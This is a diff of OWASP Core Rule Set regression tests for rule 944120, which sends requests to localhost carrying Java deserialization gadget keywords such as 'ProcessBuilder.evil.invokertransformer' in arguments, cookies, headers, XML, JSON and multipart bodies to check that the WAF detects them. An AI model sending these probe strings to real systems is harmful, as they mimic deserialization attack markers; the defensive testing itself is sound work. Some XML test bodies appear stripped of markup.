port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 62 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
\"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-66 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-67 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-68 + ProcessBuilder.evil.instantiatetransformer + 
-----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-69 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: 
+ log: + expect_ids: [944120] + - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" 
- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 78 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS 
test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 80 desc: 
